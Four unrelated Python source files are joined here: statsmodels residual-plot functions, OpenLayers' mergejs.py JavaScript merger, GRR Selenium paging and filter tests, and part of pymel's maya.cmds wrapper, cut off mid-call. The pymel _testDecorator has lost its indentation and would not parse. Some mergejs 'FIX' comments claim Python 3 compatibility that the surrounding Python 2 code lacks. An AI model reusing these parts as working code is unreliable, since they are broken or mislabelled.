    ax = utils.annotate_axes(index, labels, lzip(resid**2, leverage),
                             [(0, 5)]*int(results.nobs), "large",
                             ax=ax, ha="center", va="bottom")
    ax.margins(.075, .075)
    return fig
def plot_added_variable(results, focus_exog, resid_type=None,
                        use_glm_weights=True, fit_kwargs=None, ax=None):
    # Docstring attached below
    model = results.model

    fig, ax = utils.create_mpl_ax(ax)

    # Residualize both the response and the focus predictor against the
    # remaining predictors, then plot one against the other.
    endog_resid, focus_exog_resid = added_variable_resids(
        results, focus_exog, resid_type=resid_type,
        use_glm_weights=use_glm_weights, fit_kwargs=fit_kwargs)

    ax.plot(focus_exog_resid, endog_resid, 'o', alpha=0.6)
    ax.set_title('Added variable plot', fontsize='large')

    xname = focus_exog if type(focus_exog) is str else model.exog_names[focus_exog]
    ax.set_xlabel(xname, size=15)
    ax.set_ylabel(model.endog_names + " residuals", size=15)

    return fig
plot_added_variable.__doc__ = _plot_added_variable_doc % {
    'extra_params_doc' : "results: object\n\tResults for a fitted regression model"}
def plot_partial_residuals(results, focus_exog, ax=None):
    # Docstring attached below
    model = results.model
    focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)

    # Partial residuals against the values of the focus predictor.
    pr = partial_resids(results, focus_exog)
    focus_exog_vals = results.model.exog[:, focus_col]

    fig, ax = utils.create_mpl_ax(ax)
    ax.plot(focus_exog_vals, pr, 'o', alpha=0.6)
    ax.set_title('Partial residuals plot', fontsize='large')

    xname = focus_exog if type(focus_exog) is str else model.exog_names[focus_exog]
    ax.set_xlabel(xname, size=15)
    ax.set_ylabel("Component plus residual", size=15)

    return fig
plot_partial_residuals.__doc__ = _plot_partial_residuals_doc % {
    'extra_params_doc' : "results: object\n\tResults for a fitted regression model"}
def plot_ceres_residuals(results, focus_exog, frac=0.66, cond_means=None,
                         ax=None):
    # Docstring attached below
    model = results.model
    focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)

    # CERES residuals against the values of the focus predictor.
    ceres_vals = ceres_resids(results, focus_exog, frac=frac,
                              cond_means=cond_means)
    focus_exog_vals = model.exog[:, focus_col]

    fig, ax = utils.create_mpl_ax(ax)
    ax.plot(focus_exog_vals, ceres_vals, 'o', alpha=0.6)
    ax.set_title('CERES residuals plot', fontsize='large')
    ax.set_xlabel(focus_exog, size=15)
    ax.set_ylabel("Component plus residual", size=15)

    return fig
plot_ceres_residuals.__doc__ = _plot_ceres_residuals_doc % {
    'extra_params_doc' : "results: object\n\tResults for a fitted regression model"}
def ceres_resids(results, focus_exog, frac=0.66, cond_means=None):
    """
    Calculate the CERES residuals (Conditional Expectation Partial
    Residuals) for a fitted model.

    Parameters
    ----------
    results : model results instance
        The fitted model for which the CERES residuals are calculated.
    focus_exog : int
        The column of results.model.exog used as the 'focus variable'.
    frac : float, optional
        Lowess smoothing parameter for estimating the conditional
        means. Not used if `cond_means` is provided.
    cond_means : array-like, optional
        If provided, the columns of this array are the conditional
        means E[exog | focus exog], where exog ranges over some
        or all of the columns of exog other than focus exog. If
        this is an empty nx0 array, the conditional means are
        treated as being zero. If None, the conditional means are
        estimated.

    Returns
    -------
    An array containing the CERES residuals.

    Notes
    -----
    If `cond_means` is not provided, it is obtained by smoothing each
    column of exog (except the focus column) against the focus column.
    Currently only supports GLM, GEE, and OLS models.
    """
    model = results.model
    if not isinstance(model, (GLM, GEE, OLS)):
        raise ValueError("ceres residuals not available for %s" %
                         model.__class__.__name__)

    focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)

    # Indices of non-focus columns
    ix_nf = range(len(results.params))
    ix_nf = list(ix_nf)
    ix_nf.pop(focus_col)
    nnf = len(ix_nf)

    # Estimate the conditional means if not provided.
    if cond_means is None:
        # Below we calculate E[x | focus] where x is each column other
        # than the focus column. We don't want the intercept when we do
        # this so we remove it here.
        pexog = model.exog[:, ix_nf]
        pexog -= pexog.mean(0)

        # Project onto the left singular vectors with non-negligible
        # singular values, i.e. an orthonormal basis for the column space
        # of the centered non-focus design (drops constant columns).
        u, s, vt = np.linalg.svd(pexog, 0)
        ii = np.flatnonzero(s > 1e-6)
        pexog = u[:, ii]

        fcol = model.exog[:, focus_col]
        cond_means = np.empty((len(fcol), pexog.shape[1]))
        for j in range(pexog.shape[1]):
            # Get the fitted values for column i given the other
            # columns (skip the intercept): lowess-smooth each basis
            # column against the focus column.
            y0 = pexog[:, j]
            cf = lowess(y0, fcol, frac=frac, return_sorted=False)
            cond_means[:, j] = cf

    new_exog = np.concatenate((model.exog[:, ix_nf], cond_means), axis=1)

    # Refit the model using the adjusted exog values
    klass = model.__class__
    init_kwargs = model._get_init_kwds()
    new_model = klass(model.endog, new_exog, **init_kwargs)
    new_result = new_model.fit()

    # The partial residual, with respect to l(x2) (notation of Cook 1998)
    presid = model.endog - new_result.fittedvalues
    if isinstance(model, (GLM, GEE)):
        # Map the response-scale residual back through the link derivative.
        presid *= model.family.link.deriv(new_result.fittedvalues)
    if new_exog.shape[1] > nnf:
        # Add back the component attributable to the conditional-mean columns.
        presid += np.dot(new_exog[:, nnf:], new_result.params[nnf:])

    return presid
def partial_resids(results, focus_exog):
    """
    Returns partial residuals for a fitted model with respect to a
    'focus predictor'.

    Parameters
    ----------
    results : results instance
        A fitted regression model.
    focus_exog : int or string
        The column (index or name) of model.exog with respect to which
        the partial residuals are calculated.

    Returns
    -------
    An array of partial residuals.

    References
    ----------
    RD Cook and R Croos-Dabrera (1998). Partial residual plots in
    generalized linear models. Journal of the American Statistical
    Association, 93:442.
    """
    # TODO: could be a method of results
    # TODO: see Cook et al (1998) for a more general definition
    # The calculation follows equation (8) from Cook's paper.
    model = results.model
    resid = model.endog - results.predict()

    if isinstance(model, (GLM, GEE)):
        # Transform to the linear-predictor scale via the link derivative.
        resid *= model.family.link.deriv(results.fittedvalues)
    elif not isinstance(model, (OLS, GLS, WLS)):
        raise ValueError("Partial residuals for '%s' not implemented."
                         % type(model))

    # Resolve a variable name to its design-matrix column if needed.
    focus_col = (model.exog_names.index(focus_exog)
                 if type(focus_exog) is str else focus_exog)

    return results.params[focus_col] * model.exog[:, focus_col] + resid
def added_variable_resids(results, focus_exog, resid_type=None,
                          use_glm_weights=True, fit_kwargs=None):
    """
    Residualize the endog variable and a 'focus' exog variable in a
    regression model with respect to the other exog variables.

    Parameters
    ----------
    results : regression results instance
        A fitted model including the focus exog and all other
        predictors of interest.
    focus_exog : integer or string
        The column of results.model.exog or a variable name that is
        to be residualized against the other predictors.
    resid_type : string
        The type of residuals to use for the dependent variable. If
        None, uses `resid_deviance` for GLM/GEE and `resid` otherwise.
    use_glm_weights : bool
        Only used if the model is a GLM or GEE. If True, the
        residuals for the focus predictor are computed using WLS, with
        the weights obtained from the IRLS calculations for fitting
        the GLM. If False, unweighted regression is used.
    fit_kwargs : dict, optional
        Keyword arguments to be passed to fit when refitting the
        model.

    Returns
    -------
    endog_resid : array-like
        The residuals for the original exog
    focus_exog_resid : array-like
        The residuals for the focus predictor

    Raises
    ------
    ValueError
        If the model type is unsupported, the reduced fit does not
        converge, or `resid_type` is not an attribute of the result.

    Notes
    -----
    The 'focus variable' residuals are always obtained using linear
    regression.
    Currently only GLM, GEE, and OLS models are supported.
    """
    model = results.model
    if not isinstance(model, (GEE, GLM, OLS)):
        raise ValueError("model type %s not supported for added variable residuals" %
                         model.__class__.__name__)

    exog = model.exog
    endog = model.endog

    focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)
    focus_exog_vals = exog[:, focus_col]

    # Default residuals
    if resid_type is None:
        if isinstance(model, (GEE, GLM)):
            resid_type = "resid_deviance"
        else:
            resid_type = "resid"

    # Build the reduced design without the focus column.
    ii = range(exog.shape[1])
    ii = list(ii)
    ii.pop(focus_col)
    reduced_exog = exog[:, ii]
    # Warm-start the reduced fit from the full-model estimates.
    start_params = results.params[ii]

    klass = model.__class__
    kwargs = model._get_init_kwds()
    new_model = klass(endog, reduced_exog, **kwargs)
    args = {"start_params": start_params}
    if fit_kwargs is not None:
        args.update(fit_kwargs)
    new_result = new_model.fit(**args)
    if not new_result.converged:
        raise ValueError("fit did not converge when calculating added variable residuals")

    try:
        endog_resid = getattr(new_result, resid_type)
    except AttributeError:
        raise ValueError("'%s' residual type not available" % resid_type)

    import statsmodels.regression.linear_model as lm

    if isinstance(model, (GLM, GEE)) and use_glm_weights:
        # Residualize the focus predictor with the IRLS weights so the
        # regression matches the GLM fitting metric.
        weights = model.family.weights(results.fittedvalues)
        if hasattr(model, "data_weights"):
            weights = weights * model.data_weights
        lm_results = lm.WLS(focus_exog_vals, reduced_exog, weights).fit()
    else:
        lm_results = lm.OLS(focus_exog_vals, reduced_exog).fit()
    focus_exog_resid = lm_results.resid

    return endog_resid, focus_exog_resid
| |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2011 OpenLayers contributors / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re
import os
import sys
# Only files with this extension are considered for merging.
SUFFIX_JAVASCRIPT = ".js"

# Matches dependency declarations such as "// @requires Geo/DataSource.js";
# group 1 captures the required file path.
RE_REQUIRE = "@requires:? (.*)\n"  # TODO: Ensure in comment?


class MissingImport(Exception):
    """Exception raised when a listed import is not found in the lib."""
class SourceFile:
    """
    Represents a Javascript source code file.
    """

    def __init__(self, filepath, source):
        """
        Store the path and raw source text of one Javascript file.
        """
        self.filepath = filepath
        self.source = source
        # Populated externally with files that depend on this one.
        self.requiredBy = []

    @property
    def requires(self):
        """
        Extracts the dependencies specified in the source code and returns
        a list of them.
        """
        # TODO: Cache?
        return re.findall(RE_REQUIRE, self.source)
def usage(filename):
    """
    Displays a usage message.
    """
    # FIX: use the parenthesized single-argument form so the statement is
    # valid under both Python 2 (identical behavior) and Python 3.
    print("%s [-c <config file>] <output.js> <directory> [...]" % filename)
class Config:
    """
    Represents a parsed configuration file.

    A configuration file must contain the four section headings
    ``[first]``, ``[last]``, ``[include]`` and ``[exclude]``, in that
    order, e.g.::

        [first]
        3rd/prototype.js
        core/application.js
        core/params.js
        # A comment

        [last]
        core/api.js # Another comment

        [include]
        core/extra.js

        [exclude]
        3rd/logger.js
        exclude/this/dir

    All four headings are required; parsing raises ``ValueError`` if any
    heading is missing.

    The files listed in the `first` section will be forced to load
    *before* all other files (in the order listed). The files in `last`
    section will be forced to load *after* all the other files (in the
    order listed).

    If the `include` section is non-empty, only the listed files (plus the
    `first` files) are imported.

    The files list in the `exclude` section will not be imported.

    Any text appearing after a # symbol indicates a comment.
    """

    def __init__(self, filename):
        """
        Parses the content of the named file and stores the values.
        """
        # Strip inline comments and whitespace; drop blank/comment-only lines.
        lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
                 for line in open(filename)
                 if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
        # Slice each section between its heading and the next heading;
        # list.index raises ValueError when a heading is absent.
        self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
        self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
        self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
        self.exclude = lines[lines.index("[exclude]") + 1:]
def undesired(filepath, excludes):
    """
    Return True when `filepath` should be excluded: either it is listed
    directly in `excludes`, or it lives under an excluded directory.
    """
    # Exact file match.
    if filepath in excludes:
        return True
    # Directory-prefix match: treat every entry as a potential directory.
    for prefix in excludes:
        if not prefix.endswith("/"):
            prefix += "/"
        if filepath.startswith(prefix):
            return True
    return False
def run (sourceDirectory, outputFilename = None, configFile = None):
    """Merge the Javascript files under sourceDirectory in dependency order.

    Walks sourceDirectory for *.js files, resolves @requires dependencies
    (importing referenced files on demand), topologically sorts them,
    applies the optional Config ordering/filtering, and returns the merged
    source text (also writing it to outputFilename when given).
    """
    cfg = None
    if configFile:
        cfg = Config(configFile)

    allFiles = []

    ## Find all the Javascript source files
    for root, dirs, files in os.walk(sourceDirectory):
        for filename in files:
            if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
                # Path relative to sourceDirectory, normalized to "/".
                filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
                filepath = filepath.replace("\\", "/")
                if cfg and cfg.include:
                    # With a non-empty [include] section, only listed
                    # files (and forced-first files) are taken.
                    if filepath in cfg.include or filepath in cfg.forceFirst:
                        allFiles.append(filepath)
                elif (not cfg) or (not undesired(filepath, cfg.exclude)):
                    allFiles.append(filepath)

    ## Header inserted at the start of each file in the output
    HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"

    files = {}

    ## Import file source code
    ## TODO: Do import when we walk the directories above?
    for filepath in allFiles:
        print "Importing: %s" % filepath
        fullpath = os.path.join(sourceDirectory, filepath).strip()
        content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
        files[filepath] = SourceFile(filepath, content) # TODO: Chop path?

    print

    from toposort import toposort

    complete = False
    resolution_pass = 1

    # Repeatedly scan for @requires targets not yet imported; each pass may
    # pull in files whose own requirements need another pass.
    while not complete:
        complete = True

        ## Resolve the dependencies
        print "Resolution pass %s... " % resolution_pass
        resolution_pass += 1

        for filepath, info in files.items():
            for path in info.requires:
                if not files.has_key(path):
                    complete = False
                    fullpath = os.path.join(sourceDirectory, path).strip()
                    if os.path.exists(fullpath):
                        print "Importing: %s" % path
                        content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
                        files[path] = SourceFile(path, content) # TODO: Chop path?
                    else:
                        raise MissingImport("File '%s' not found (required by '%s')." % (path, filepath))

    # create dictionary of dependencies
    dependencies = {}
    for filepath, info in files.items():
        dependencies[filepath] = info.requires

    print "Sorting..."
    order = toposort(dependencies) #[x for x in toposort(dependencies)]

    ## Move forced first and last files to the required position
    if cfg:
        print "Re-ordering files..."
        order = cfg.forceFirst + [item
                                  for item in order
                                  if ((item not in cfg.forceFirst) and
                                      (item not in cfg.forceLast))] + cfg.forceLast

    print
    ## Output the files in the determined order
    result = []

    for fp in order:
        f = files[fp]
        print "Exporting: ", f.filepath
        result.append(HEADER % f.filepath)
        source = f.source
        result.append(source)
        # Ensure each file's source ends with a newline in the output.
        if not source.endswith("\n"):
            result.append("\n")

    print "\nTotal files merged: %d " % len(files)

    if outputFilename:
        print "\nGenerating: %s" % (outputFilename)
        open(outputFilename, "w").write("".join(result))
    return "".join(result)
if __name__ == "__main__":
    import getopt

    options, args = getopt.getopt(sys.argv[1:], "-c:")

    # FIX: both positional arguments are now read inside the try block;
    # previously a missing <directory> raised an uncaught IndexError
    # instead of showing the usage message.
    try:
        outputFilename = args[0]
        sourceDirectory = args[1]
    except IndexError:
        usage(sys.argv[0])
        raise SystemExit

    if not sourceDirectory:
        usage(sys.argv[0])
        raise SystemExit

    configFile = None
    if options and options[0][0] == "-c":
        configFile = options[0][1]
        # BUG FIX: this previously printed the undefined name `filename`
        # (NameError); the intended value is the config file path. The
        # parenthesized print form is valid on both Python 2 and 3.
        print("Parsing configuration file: %s" % configFile)

    run( sourceDirectory, outputFilename, configFile )
| |
#!/usr/bin/env python
"""This modules contains tests for Angular components."""
from grr.gui import runtests_test
from grr.lib import aff4
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import test_lib
class CollectionTableDirectiveTest(test_lib.GRRSeleniumTest):
    """Test for angular collection table.

    NOTE: this class uses CollectionTableTestRenderer defined in
    angular_components_testonly.py.
    """

    def CreateCollectionWithMessages(self, messages):
        # Creates the fixture collection at a fixed URN with one FlowLog
        # entry per message (ACL checks bypassed for test setup).
        with self.ACLChecksDisabled():
            with aff4.FACTORY.Create("aff4:/tmp/collection",
                                     aff4_type="RDFValueCollection",
                                     mode="w", token=self.token) as fd:
                for message in messages:
                    fd.Add(rdfvalue.FlowLog(log_message=message))

    def CreateCollection(self, num_items):
        # Convenience wrapper: fills the collection with
        # "Message 0" .. "Message num_items-1".
        messages = []
        for i in range(num_items):
            messages.append("Message %d" % i)
        self.CreateCollectionWithMessages(messages)

    def testShowsEmptyListWhenCollectionIsNotFound(self):
        # No collection was created, so the table should show a placeholder.
        self.Open("/#main=CollectionTableTestRenderer")
        self.WaitUntil(self.IsTextPresent, "No entries")

    def testPagingIsDisabledWhenNotEnoughElements(self):
        # A single page of items: all paging controls should be disabled.
        self.CreateCollection(5)
        self.Open("/#main=CollectionTableTestRenderer")
        for i in range(5):
            self.WaitUntil(self.IsTextPresent, "Message %d" % i)
        self.WaitUntil(self.IsElementPresent,
                       "css=grr-collection-table li:contains('Prev').disabled")
        self.WaitUntil(self.IsElementPresent,
                       "css=grr-collection-table li:contains('Next').disabled")
        self.WaitUntil(self.IsElementPresent,
                       "css=grr-collection-table li:contains('1').disabled")

    def testPagingWorksCorrectlyFor2Pages(self):
        # Two pages of five items each; walk forward/back via Next/Prev and
        # via the numbered page links, checking visible rows and control
        # enabled/disabled state at each step.
        self.CreateCollection(5 * 2)

        def CheckThatPrevAndOneAreDisabled():
            # On page 1: Prev and '1' disabled, Next and '2' enabled.
            self.WaitUntil(self.IsElementPresent,
                           "css=grr-collection-table li:contains('Prev').disabled")
            self.WaitUntil(
                self.IsElementPresent,
                "css=grr-collection-table li:contains('Next'):not(.disabled)")
            self.WaitUntil(self.IsElementPresent,
                           "css=grr-collection-table li:contains('1').disabled")
            self.WaitUntil(self.IsElementPresent,
                           "css=grr-collection-table li:contains('2'):not(.disabled)")

        def CheckThatNextAndTwoAreDisabled():
            # On page 2: Next and '2' disabled, Prev and '1' enabled.
            self.WaitUntil(
                self.IsElementPresent,
                "css=grr-collection-table li:contains('Prev'):not(.disabled)")
            self.WaitUntil(self.IsElementPresent,
                           "css=grr-collection-table li:contains('Next').disabled")
            self.WaitUntil(self.IsElementPresent,
                           "css=grr-collection-table li:contains('1'):not(.disabled)")
            self.WaitUntil(self.IsElementPresent,
                           "css=grr-collection-table li:contains('2').disabled")

        def CheckFirstFiveMessagesAreVisible():
            for i in range(5):
                self.WaitUntil(self.IsTextPresent, "Message %d" % i)
            for i in range(5, 10):
                self.WaitUntilNot(self.IsTextPresent, "Message %d" % i)

        def CheckLastFiveMessageAreVisible():
            for i in range(5, 10):
                self.WaitUntil(self.IsTextPresent, "Message %d" % i)
            for i in range(5):
                self.WaitUntilNot(self.IsTextPresent, "Message %d" % i)

        self.Open("/#main=CollectionTableTestRenderer")
        CheckFirstFiveMessagesAreVisible()
        CheckThatPrevAndOneAreDisabled()

        self.Click("css=grr-collection-table a:contains('Next')")
        CheckLastFiveMessageAreVisible()
        CheckThatNextAndTwoAreDisabled()

        self.Click("css=grr-collection-table a:contains('Prev')")
        CheckFirstFiveMessagesAreVisible()
        CheckThatPrevAndOneAreDisabled()

        self.Click("css=grr-collection-table a:contains('2')")
        CheckLastFiveMessageAreVisible()
        CheckThatNextAndTwoAreDisabled()

        self.Click("css=grr-collection-table a:contains('1')")
        CheckFirstFiveMessagesAreVisible()
        CheckThatPrevAndOneAreDisabled()

    def testPagingWorksCorrectlyFor15Pages(self):
        # Visit every numbered page link; check that page i shows exactly
        # its own five messages (and not its neighbours' boundary items).
        self.CreateCollection(5 * 15)
        self.Open("/#main=CollectionTableTestRenderer")
        for i in range(15):
            self.Click("css=grr-collection-table a:contains('%d')" % (i + 1))
            for j in range(i * 5, i * 5 + 5):
                self.WaitUntil(self.IsTextPresent, "Message %d" % j)
            if i > 0:
                self.WaitUntilNot(self.IsTextPresent, "Message %d" % (i * 5 - 1))
            if i < 14:
                self.WaitUntilNot(self.IsTextPresent, "Message %d" % (i * 5 + 6))

    def testFilterWorksCorrectlyFor5Elements(self):
        # Apply a filter, check only matching rows (plus the "Filtered by"
        # label) remain, then clear the filter and check everything returns.
        self.CreateCollectionWithMessages(
            ["some1", "other1", "other2", "other3", "some2"])
        self.Open("/#main=CollectionTableTestRenderer")

        self.WaitUntil(self.IsTextPresent, "some1")
        self.WaitUntil(self.IsTextPresent, "some2")
        self.WaitUntil(self.IsTextPresent, "other1")
        self.WaitUntil(self.IsTextPresent, "other2")
        self.WaitUntil(self.IsTextPresent, "other3")
        self.WaitUntilNot(self.IsTextPresent, "Filtered by")

        self.Type("css=grr-collection-table input.search-query",
                  "some")
        self.Click("css=grr-collection-table button:contains('Filter')")

        self.WaitUntil(self.IsTextPresent, "some1")
        self.WaitUntil(self.IsTextPresent, "some2")
        self.WaitUntilNot(self.IsTextPresent, "other1")
        self.WaitUntilNot(self.IsTextPresent, "other2")
        self.WaitUntilNot(self.IsTextPresent, "other3")
        self.WaitUntil(self.IsTextPresent, "Filtered by: some")

        self.Type("css=grr-collection-table input.search-query", "")
        self.Click("css=grr-collection-table button:contains('Filter')")

        self.WaitUntil(self.IsTextPresent, "some1")
        self.WaitUntil(self.IsTextPresent, "some2")
        self.WaitUntil(self.IsTextPresent, "other1")
        self.WaitUntil(self.IsTextPresent, "other2")
        self.WaitUntil(self.IsTextPresent, "other3")
        self.WaitUntilNot(self.IsTextPresent, "Filtered by")

    def testFilterShowsFetchMoreButtonForMoreThanOnePageOfFilteredResults(self):
        # Six matches with a five-item page: "Fetch More" loads the sixth.
        self.CreateCollectionWithMessages(
            ["some1", "some2", "some3", "some4", "some5", "some6",
             "other1", "other2", "other3", "other4"])
        self.Open("/#main=CollectionTableTestRenderer")

        self.Type("css=grr-collection-table input.search-query",
                  "some")
        self.Click("css=grr-collection-table button:contains('Filter')")

        self.WaitUntil(self.IsTextPresent, "some1")
        self.WaitUntil(self.IsTextPresent, "some5")
        self.WaitUntilNot(self.IsTextPresent, "some6")

        self.Click("css=grr-collection-table button:contains('Fetch More')")
        self.WaitUntil(self.IsTextPresent, "some6")

    def testFetchAllButtonFetchesAllFilteredResults(self):
        # 20 matches: one "Fetch More" shows the second batch; the
        # "Fetch All" dropdown entry loads every remaining match.
        messages = []
        for i in range(20):
            messages.append("some%d" % i)
        for i in range(100):
            messages.append("other%d" % i)
        self.CreateCollectionWithMessages(messages)

        self.Open("/#main=CollectionTableTestRenderer")
        self.Type("css=grr-collection-table input.search-query",
                  "some")
        self.Click("css=grr-collection-table button:contains('Filter')")

        self.WaitUntil(self.IsTextPresent, "some0")
        self.WaitUntil(self.IsTextPresent, "some4")
        self.WaitUntilNot(self.IsTextPresent, "some5")

        self.Click("css=grr-collection-table button:contains('Fetch More')")
        self.WaitUntil(self.IsTextPresent, "some5")
        self.WaitUntil(self.IsTextPresent, "some9")
        self.WaitUntilNot(self.IsTextPresent, "some10")

        self.Click("css=grr-collection-table button:contains('Fetch More') ~ "
                   "button[data-toggle=dropdown]")
        self.Click("css=grr-collection-table a:contains('Fetch All')")
        self.WaitUntil(self.IsTextPresent, "some10")
        self.WaitUntil(self.IsTextPresent, "some19")
def main(argv):
    """Entry point: run the full Selenium test suite for this module."""
    # Run the full test suite
    runtests_test.SeleniumTestProgram(argv=argv)


if __name__ == "__main__":
    # Delegate flag parsing and startup to the GRR flags helper.
    flags.StartMain(main)
| |
'''
This module wraps maya.cmds to accept special pymel arguments.
There are a number of pymel objects which must be converted to a "mel-friendly"
representation. For example, in versions prior to 2009, some mel commands (ie, getAttr) which expect
string arguments will simply reject custom classes, even if they have a valid string representation.
Another example is mel's matrix inputs, which expect a flat list of 16 floats, while pymel's Matrix has a more typical
4x4 representation.
If you're having compatibility issues with your custom classes when passing them to maya.cmds,
simply add a __melobject__ function that returns a mel-friendly result and pass them to pymel's wrapped commands.
The wrapped commands in this module are the starting point for any other pymel customizations.
'''
import inspect
import sys
import re
import os
import types
import pymel.util as util
import pymel.versions as versions
#import mayautils
import maya.cmds
import warnings
# Public API of this module.
__all__ = ['getMelRepresentation']

# Reference to this module itself, used when installing wrapped commands.
_thisModule = sys.modules[__name__]

# The exception type/message for an invalid object reference differs by
# Maya version:
# In Maya <= 2011, the error would be:
#   TypeError: Object foo.bar is invalid
# In Maya 2012, it is:
#   ValueError: No object matches name: foo.bar
if versions.current() < versions.v2012:
    objectErrorType = TypeError
    objectErrorReg = re.compile(',?Object (.*) is invalid,?$')
else:
    objectErrorType = ValueError
    objectErrorReg = re.compile(',?No object matches name: ,?(.*)$')
def _testDecorator(function):
def newFunc(*args, **kwargs):
print "wrapped function for %s" % function.__name__
return function(*args, **kwargs)
newFunc.__name__ = function.__name__
newFunc.__doc__ = function.__doc__
return newFunc
def getCmdName(inFunc):
    '''Return the real maya command name for inFunc.

    Use in place of inFunc.__name__ when inFunc could be a maya.cmds command:
    maya's lazily-loaded plugin stubs all share the name 'stubFunc', so for
    those the actual command name is recovered from the stub's closure.
    '''
    cmdName = inFunc.__name__
    if cmdName == 'stubFunc':
        sourceFile = inspect.getsourcefile(inFunc)
        if (isinstance(sourceFile, basestring) and
                os.path.join('maya', 'app', 'commands') in sourceFile):
            # Here's where it gets tricky... this is a fairly big hack, highly
            # dependent on the exact implementation of maya.app.commands.stubFunc:
            # the real command name lives in the 'command' free variable of the
            # stub's closure.
            freevars = inFunc.func_code.co_freevars
            # in python 2.5, tuples don't have index / find methods
            if not hasattr(freevars, 'index'):
                freevars = list(freevars)
            # BUG FIX: the old code raised whenever the index was non-zero;
            # list.index itself raises ValueError when 'command' is absent,
            # which is the condition we actually want to report.
            try:
                freeVarIndex = freevars.index('command')
            except ValueError:
                raise ValueError('could not find a command var in %s' % cmdName)
            cmdName = inFunc.func_closure[freeVarIndex].cell_contents
    return cmdName
def getMelRepresentation(args, recursionLimit=None, maintainDicts=True):
    """Will return a list which contains each element of the iterable 'args' converted to a mel-friendly representation.

    :Parameters:
        recursionLimit : int or None
            If an element of args is itself iterable, recursionLimit specifies the depth to which iterable elements
            will recursively search for objects to convert; if ``recursionLimit==0``, only the elements
            of args itself will be searched for PyNodes - if it is 1, iterables within args will have getMelRepresentation called
            on them, etc. If recursionLimit==None, then there is no limit to recursion depth.

            NOTE(review): the recursion test below treats a limit that has
            reached 0 the same as None (both recurse), which looks
            inconsistent with the description above -- confirm before
            relying on ``recursionLimit=0``.
        maintainDicts : bool
            In general, all iterables will be converted to tuples in the returned copy - however, if maintainDicts==True,
            then iterables for which ``util.isMapping()`` returns True will be returned as dicts.
    """
    # Consume one level of the remaining depth (None and 0 are left as-is).
    if recursionLimit:
        recursionLimit -= 1
    if maintainDicts and util.isMapping(args):
        # Preserve mappings: shallow-copy and iterate key/value pairs (Py2).
        newargs = dict(args)
        argIterable = args.iteritems()
        isList = False
    else:
        newargs = list(args)
        argIterable = enumerate(args)
        isList = True
    for index, value in argIterable:
        try:
            # Objects advertise their mel-friendly form via __melobject__...
            newargs[index] = value.__melobject__()
        except AttributeError:
            if ((not recursionLimit) or recursionLimit >= 0) and util.isIterable(value):
                # ...otherwise, recurse if not at recursion limit and it's iterable
                newargs[index] = getMelRepresentation(value, recursionLimit, maintainDicts)
    if isList:
        # Non-mapping iterables are returned as tuples.
        newargs = tuple(newargs)
    return newargs
def addWrappedCmd(cmdname, cmd=None):
    '''Install a pymel-aware wrapper for the maya.cmds command *cmdname* as an
    attribute of this module.

    The wrapper converts all positional and keyword arguments to their
    mel-friendly form via getMelRepresentation before delegating to the real
    maya.cmds function, and translates maya's "invalid object" errors into
    pymel's exception type.
    '''
    if cmd is None:
        cmd = getattr(maya.cmds, cmdname)
    # if cmd.__name__ == 'dummyFunc': print cmdname

    def wrappedCmd(*args, **kwargs):
        # we must get the cmd each time, because maya delays loading of functions until they are needed.
        # if we don't reload we'll keep the dummyFunc around
        new_cmd = getattr(maya.cmds, cmdname)
        # print args, kwargs
        # convert args to mel-friendly representation
        new_args = getMelRepresentation(args)
        # flatten list. this is necessary for list of components. see Issue 71. however, be sure that it's not an empty list/tuple
        if len(new_args) == 1 and util.isIterable(new_args[0]) and len(new_args[0]):  # isinstance( new_args[0], (tuple, list) ):
            new_args = new_args[0]
        new_kwargs = getMelRepresentation(kwargs)
        # print new_args, new_kwargs
        try:
            res = new_cmd(*new_args, **new_kwargs)
        except objectErrorType, e:
            # objectErrorType/objectErrorReg are chosen at import time based
            # on the Maya version (TypeError pre-2012, ValueError after).
            m = objectErrorReg.match(str(e))
            if m:
                import pymel.core.general
                obj = m.group(1)
                raise pymel.core.general._objectError(obj)
            else:
                # re-raise error
                raise
        # when editing, some of maya.cmds functions return empty strings and some return idiotic statements like 'Values Edited'.
        # however, for UI's in particular, people use the edit command to get a pymel class for existing objects.
        # return None when we get an empty string
        try:
            if res == '' and kwargs.get('edit', kwargs.get('e', False)):
                return None
        except AttributeError:
            pass
        return res

    oldname = getattr(cmd, '__name__', None)
    if isinstance(oldname, str):
        # Don't use cmd.__name__, as this could be 'stubFunc'
        newname = getCmdName(cmd)
    else:
        newname = str(cmdname)
    old_code = wrappedCmd.func_code
    # want to change the name, not just of the func, but of the underlying
    # code object - this makes it much easier to get useful information when
    # using cProfile
    # unfortunately, this isn't easy - have to get hacky...
    # ...we could do it with a big string and exec, but then we'd lose both
    # syntax highlighting, and file + lineno info...
    # Rebuild the code object field-by-field (Py2 CodeType signature),
    # changing only co_name.
    new_code = types.CodeType(old_code.co_argcount,
                              old_code.co_nlocals,
                              old_code.co_stacksize,
                              old_code.co_flags,
                              old_code.co_code,
                              old_code.co_consts,
                              old_code.co_names,
